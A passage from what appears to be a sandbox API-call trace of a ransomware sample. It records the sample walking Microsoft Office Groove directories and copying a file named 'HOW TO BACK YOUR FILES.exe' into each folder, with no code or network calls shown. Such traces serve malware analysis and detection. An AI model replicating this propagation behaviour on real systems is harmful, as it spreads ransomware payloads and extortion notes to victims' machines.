returned -1 [0071.321] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.321] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type" [0071.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d98 | out: hHeap=0x2b0000) returned 1 [0071.321] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2740 | out: hHeap=0x2b0000) returned 1 [0071.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type") returned 122 [0071.321] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type" [0071.321] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.321] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.332] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.332] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c04c1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c04c1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.332] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.332] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.332] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy" [0071.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0071.332] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2760 | out: hHeap=0x2b0000) returned 1 [0071.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy") returned 128 [0071.332] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy" [0071.332] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.332] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\fancy\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.341] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.341] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c072320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c072320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.341] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.341] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.341] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic" [0071.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0071.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2740 | out: hHeap=0x2b0000) returned 1 [0071.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic") returned 128 [0071.341] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic" [0071.341] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.341] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttool\\project report type\\basic\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.346] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.346] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Basic\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6073a7d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c072320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c072320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.346] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.346] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.346] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5" [0071.346] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e32c0 | out: hHeap=0x2b0000) returned 1 [0071.346] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2720 | out: hHeap=0x2b0000) returned 1 [0071.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5") returned 82 [0071.346] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5" [0071.346] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.346] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.364] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.365] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c072320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c072320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.365] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.365] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.367] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4" [0071.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e3210 | out: hHeap=0x2b0000) returned 1 [0071.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2700 | out: hHeap=0x2b0000) returned 1 [0071.367] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4") returned 82 [0071.367] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4" [0071.367] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.367] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.373] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.373] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c0be5e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c0be5e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.373] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.373] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.377] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles" [0071.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0071.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2700 | out: hHeap=0x2b0000) returned 1 [0071.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles") returned 94 [0071.377] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles" [0071.377] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.377] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.383] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.383] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c0be5e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c0be5e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.383] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.383] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.384] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl" [0071.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d45b8 | out: hHeap=0x2b0000) returned 1 [0071.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d28a0 | out: hHeap=0x2b0000) returned 1 [0071.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl") returned 100 [0071.384] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl" [0071.384] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.384] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\swirl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.390] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.390] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Swirl\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ac7a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c0e4740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c0e4740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.390] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.390] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.390] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2" [0071.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0071.390] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2880 | out: hHeap=0x2b0000) returned 1 [0071.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2") returned 99 [0071.391] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2" [0071.391] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.391] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts2\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.396] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.396] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\STS2\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c0e4740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c0e4740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.396] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.396] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.397] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen" [0071.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5fb0 | out: hHeap=0x2b0000) returned 1 [0071.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2860 | out: hHeap=0x2b0000) returned 1 [0071.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen") returned 106 [0071.397] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen" [0071.397] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.397] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.401] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.401] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ab49610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c10a8a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c10a8a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.401] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.401] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.402] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue" [0071.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d44e0 | out: hHeap=0x2b0000) returned 1 [0071.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2840 | out: hHeap=0x2b0000) returned 1 [0071.402] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue") returned 103 [0071.402] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue" [0071.402] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.402] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\HOW TO BACK YOUR FILES.exe" 